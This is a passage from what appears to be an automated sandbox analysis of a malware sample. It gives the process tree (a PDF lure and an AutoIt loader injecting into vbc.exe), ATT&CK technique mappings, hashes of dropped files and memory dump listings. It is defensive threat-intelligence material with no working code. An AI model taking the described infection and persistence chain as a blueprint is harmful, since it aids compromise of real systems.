,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=C09F4176AA5833997C07D51D3FF35E4C --renderer-client-id=6 --mojo-platform-channel-handle=2304 --allow-no-sandbox-job /prefetch:1
        6⤵
        
        PID:3192
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=6DB28014767495B502DAF40EBC31467C --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=6DB28014767495B502DAF40EBC31467C --renderer-client-id=10 --mojo-platform-channel-handle=2488 --allow-no-sandbox-job /prefetch:1
        6⤵
        
        PID:5044
      - \??\c:\windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        c:\windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        6⤵
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:528
  - - C:\Users\Admin\AppData\Roaming\Autoit3.exe
      "C:\Users\Admin\AppData\Roaming\Autoit3.exe" C:\Users\Admin\AppData\Roaming\script.au3
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:1756

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\bdhhcbh\dbefcda

Filesize
1KB

MD5
6ad711afef2789d0eef5bdd3763dd127

SHA1
8b1ec706b484cde081d31ca307e0e9a02527f067

SHA256
0b3e109ad2f47fcd8fdd6dae4609add0b9b2c7fef29b03e33df5c64f1487e1b6

SHA512
98bac6bc6a11e23824a716e56e92b8b2b45925773a6bea4b601281080658d33a1f1cce0cd76eeffaf17256ff88c64467b21338dba00bf285d8d33b61a366a148

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
e9f241214f06b0fca6fe6ac2b7462e6f

SHA1
e19a1b5e6e587a536b0a9186118f1e4f776d1988

SHA256
9bca2ab49915dab5f5acb19795bc443b88f2963fa66e8a685f4ae1715c4166d8

SHA512
da2f42acf687717632cb8c003f1f98a20345c2bb3dfd6de05d27ed31ad5c6e258df562f7d8034a7f4a809001d51666ee34a31920fbddf5c05d75aa753b8a8cef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
0aa30cb82b8891d5a57a64ed312a14fb

SHA1
fcc5dc9d9d71026af3afb1abd007f75ea102e2ff

SHA256
c53094f79b260343ba1efa7d8e62dfa6ab8cf275f947e4eb6bec200228342efb

SHA512
e6d9eec3765d3f883e16374d956f31f20bc6147acdffe471540bad8a030b92a7dcfd4bcc10726b9e048a6e3a587fbf468121836c6126b4508a3b786fa721c333

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_05uzrlel.f1m.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Roaming\aebaeeb

Filesize
32B

MD5
ce341e30798c062f8646aa25c7a74ec5

SHA1
e12cbe05aaf680be67c3a2a935216a310b64e8af

SHA256
62439e10313ee6056bf58ed5958696a1b09691886e18bb24ad5364cbb9e2aabf

SHA512
2c1f7bd0ab0218a00f4c77e80155a1220177b0981571eaf806fe99a045eaa5c44b50f775d681d6b3c6726d1950ceb34347a40157b000132b1a0c199f548e4259

Download Submit
C:\Users\Admin\AppData\Roaming\p1345.pdf

Filesize
5.1MB

MD5
fdb6a876358b17a1ddfa453519503725

SHA1
f62ecf2670792af59197e93ecadd24ce106f4759

SHA256
8f4b370ec0934a1d65867fc47c6a54f1fbafe456dd0e64413cc24dc69720a965

SHA512
304688c1af0f3dc7276d56a194af55be1ba901424538a17614548e9d6766417da43d8a95134360a9ef2f36f4d974b11bd70d61cde9358a3ad7c263e2d6f98a37

Download Submit
C:\Users\Admin\AppData\Roaming\script.au3

Filesize
576KB

MD5
13160c138aced9288e897c0eb2db46cb

SHA1
d07340d43fcf1a8b824a72959e0ed1c836f3da04

SHA256
4527715b314ef96605aa84bcbd7194544f9cf72368e1b95d06cf11b95ffd91c2

SHA512
d57d8c4623a32e7ab1507535c13469b83a6482c444eacf0d7be112a81947b81c09dd9da0cac9ede7ba1770299cd06d5708426ea075a41b3679297bc7c7518c8c

Download Submit
C:\Users\Admin\AppData\Roaming\test.txt

Filesize
76B

MD5
b9058fb0788940a03148a71d8530b426

SHA1
a0e6d9d4f5aca04e86e433ad87110288de38da07

SHA256
53ec8b2b5fbdd2f91e46b9acd51483b5e377fc2ed6761364ab32c9281013975d

SHA512
9fec43d35146831e15c631fe76e9542f6092614eda628c41bb1c8114b584c6b4b09d86811c423384a98f0f43b5f42bece120afd26d23f2d348397572907a9a54

Download Submit
C:\temp\cc.txt

Filesize
4B

MD5
ddd2d288ca2d08fb364005d5f27d70fe

SHA1
68da6ee976c4030c7099086f5bce4277934adb7d

SHA256
031c4e9688e26236e57f7649b74f1ebb8945daa7f374934fc528e66c41c40cef

SHA512
76713f7fe1d10ac13cc98949f7b3234e02a26c943a88502d25c6886d6b2641eb58299e3fe7b4a28c351980fc46074b1b5be81a2cd14b65b126bf08b2512b9e14

Download Submit
C:\temp\cc.txt

Filesize
4B

MD5
5b798c430c8f4caf3d6832977271c7fa

SHA1
ff2ad408f6101e5c5f77b9c417aa7ac011e42159

SHA256
f3ffc0bc0a044895e27144a022bf2e54d2e19fea699c089653ccf04e4e2d5c1f

SHA512
95d5c9d77d389899453cf10cefc2d088b8cfdf2deb28dabbb627899f098ba9104f1ded590e041015ca874298c41faa057d05648f4bd56b0ba019a50363129793

Download Submit
C:\temp\fs.txt

Filesize
4B

MD5
79c7709d2919d5fe1062874f74681ce6

SHA1
8222aa0f438ac29dbab12e6997b7f0d8c93dc489

SHA256
dc7a45361c1ab854a2c390a4c8bc1242ea09dcedad339389fcc698f2a692a528

SHA512
75a728ef7c7b198670ffebd090aa0de0d87846354e87aaa7b945d81f015e2e3fadac68ac9c8e7aaae150d50a9a4bbfac6753df3172147603e8171ec7fd8db174

Download Submit
C:\temp\lp.txt

Filesize
4B

MD5
6c0958d82a830a02c0718147b1b565c1

SHA1
7d8a209751f64b7e616de77b0e519f77cdd0fc81

SHA256
7db08657e1d436883b51a6385ab896e95b3ffc1a7e4591b644b0e8aa49360c97

SHA512
a857bcaa53c9a6d18280558c086bda18e2eed140388c919d61e039dec76588edfd58534f5de76279e7b8975f68f9da29146347203843165dcb676393b0a3fb48

Download Submit
memory/208-366-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/208-285-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/208-311-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/208-338-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/208-303-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/208-207-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/208-347-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/208-294-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/208-330-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/208-320-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/208-392-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/208-356-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/208-383-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/208-375-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/528-177-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/528-180-0x0000000000470000-0x0000000000539000-memory.dmp

Filesize
804KB

Download
memory/528-181-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/528-179-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/876-301-0x000000000A3D0000-0x000000000A67B000-memory.dmp

Filesize
2.7MB

Download
memory/1312-36-0x0000000007760000-0x00000000077F6000-memory.dmp

Filesize
600KB

Download
memory/1312-23-0x0000000004D50000-0x0000000004D60000-memory.dmp

Filesize
64KB

Download
memory/1312-81-0x0000000008680000-0x000000000868E000-memory.dmp

Filesize
56KB

Download
memory/1312-82-0x0000000008690000-0x00000000086A4000-memory.dmp

Filesize
80KB

Download
memory/1312-83-0x00000000086D0000-0x00000000086EA000-memory.dmp

Filesize
104KB

Download
memory/1312-84-0x0000000008710000-0x0000000008718000-memory.dmp

Filesize
32KB

Download
memory/1312-63-0x0000000008600000-0x000000000860A000-memory.dmp

Filesize
40KB

Download
memory/1312-62-0x0000000008610000-0x0000000008622000-memory.dmp

Filesize
72KB

Download
memory/1312-98-0x0000000070860000-0x0000000071010000-memory.dmp

Filesize
7.7MB

Download
memory/1312-61-0x00000000085C0000-0x00000000085D1000-memory.dmp

Filesize
68KB

Download
memory/1312-71-0x000000006D270000-0x000000006D5C4000-memory.dmp

Filesize
3.3MB

Download
memory/1312-60-0x00000000085B0000-0x00000000085BA000-memory.dmp

Filesize
40KB

Download
memory/1312-24-0x0000000004D50000-0x0000000004D60000-memory.dmp

Filesize
64KB

Download
memory/1312-35-0x0000000007530000-0x00000000075A6000-memory.dmp

Filesize
472KB

Download
memory/1312-59-0x0000000004D50000-0x0000000004D60000-memory.dmp

Filesize
64KB

Download
memory/1312-58-0x00000000084B0000-0x0000000008553000-memory.dmp

Filesize
652KB

Download
memory/1312-57-0x0000000004D50000-0x0000000004D60000-memory.dmp

Filesize
64KB

Download
memory/1312-22-0x0000000070860000-0x0000000071010000-memory.dmp

Filesize
7.7MB

Download
memory/1312-56-0x0000000008490000-0x00000000084AE000-memory.dmp

Filesize
120KB

Download
memory/1312-46-0x000000006D270000-0x000000006D5C4000-memory.dmp

Filesize
3.3MB

Download
memory/1312-45-0x000000006D100000-0x000000006D14C000-memory.dmp

Filesize
304KB

Download
memory/1312-34-0x00000000073A0000-0x00000000073E4000-memory.dmp

Filesize
272KB

Download
memory/1312-44-0x0000000008450000-0x0000000008482000-memory.dmp

Filesize
200KB

Download
memory/1312-43-0x000000007F670000-0x000000007F680000-memory.dmp

Filesize
64KB

Download
memory/1312-38-0x0000000008860000-0x0000000008E04000-memory.dmp

Filesize
5.6MB

Download
memory/1312-37-0x0000000007710000-0x0000000007732000-memory.dmp

Filesize
136KB

Download
memory/1460-20-0x0000000007B10000-0x000000000818A000-memory.dmp

Filesize
6.5MB

Download
memory/1460-17-0x0000000005BD0000-0x0000000005F24000-memory.dmp

Filesize
3.3MB

Download
memory/1460-0-0x0000000002890000-0x00000000028C6000-memory.dmp

Filesize
216KB

Download
memory/1460-1-0x0000000070860000-0x0000000071010000-memory.dmp

Filesize
7.7MB

Download
memory/1460-2-0x0000000004D90000-0x0000000004DA0000-memory.dmp

Filesize
64KB

Download
memory/1460-102-0x0000000070860000-0x0000000071010000-memory.dmp

Filesize
7.7MB

Download
memory/1460-21-0x00000000066F0000-0x000000000670A000-memory.dmp

Filesize
104KB

Download
memory/1460-19-0x0000000006210000-0x000000000625C000-memory.dmp

Filesize
304KB

Download
memory/1460-18-0x00000000061E0000-0x00000000061FE000-memory.dmp

Filesize
120KB

Download
memory/1460-3-0x0000000004D90000-0x0000000004DA0000-memory.dmp

Filesize
64KB

Download
memory/1460-6-0x0000000005AF0000-0x0000000005B56000-memory.dmp

Filesize
408KB

Download
memory/1460-7-0x0000000005B60000-0x0000000005BC6000-memory.dmp

Filesize
408KB

Download
memory/1460-5-0x0000000005220000-0x0000000005242000-memory.dmp

Filesize
136KB

Download
memory/1460-4-0x00000000053D0000-0x00000000059F8000-memory.dmp

Filesize
6.2MB

Download
memory/1756-161-0x00000000056E0000-0x0000000005A2E000-memory.dmp

Filesize
3.3MB

Download
memory/1756-104-0x0000000004180000-0x0000000005150000-memory.dmp

Filesize
15.8MB

Download
memory/1756-105-0x00000000056E0000-0x0000000005A2E000-memory.dmp

Filesize
3.3MB

Download
memory/2024-152-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-339-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-302-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-293-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-286-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-312-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-175-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-321-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-329-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-174-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-171-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-295-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-168-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-348-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-157-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-357-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-365-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-154-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-374-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-153-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-393-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/2024-384-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/3520-138-0x0000000001BC0000-0x0000000001BC1000-memory.dmp

Filesize
4KB

Download
memory/3520-140-0x0000000005E00000-0x00000000065A2000-memory.dmp

Filesize
7.6MB

Download